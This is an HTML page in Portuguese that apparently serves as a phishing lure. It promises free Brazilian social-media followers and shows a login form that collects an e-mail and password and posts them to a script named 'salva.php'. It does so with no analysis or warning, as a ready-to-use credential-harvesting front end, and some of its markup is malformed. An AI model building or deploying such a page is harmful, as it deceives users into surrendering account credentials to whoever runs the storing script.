<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <title>Seguidores Grátis</title>

    <style>
        p{
            text-align: center;
        }
    </style>
</head>

<body>
    <div class="box">
        <div class="img-box">
            <img src="img-formulario.png">
        </div>
        <div class="form-box">
            <h2>TELA DE LOGIN</h2>

            <form action="salva.php" method="POST">

                <div class="input-group">
                    <label for="email">E-mail</label>
                    <input type="email" name="email" id="email" placeholder="E-mail: ">
                </div>

                <div class="input-group w50">
                    <label for="senha">Senha</label>
                    <input type="password" name="senha" id="senha" placeholder="Senha: ">
                </div>

                <select>
                     <option value="0"> Quantos Seguidores?</option>
                     <option value="1"> 100 Seguidores</option>
                     <option value="2"> 500 Seguidores</option>
                     <option value="3"> 1000 Seguidores</option>                    
                </select>
                <p>100% Seguro Seguidores Brasileiro Reais</p>
                

                <div class="input-group">
                    <link rel="stylesheet" type="text/css" href="parabens.html"><button>Enviar Seguidores</button></link>
                </div>

            </form>
        </div>
    </div>
</body>
</html>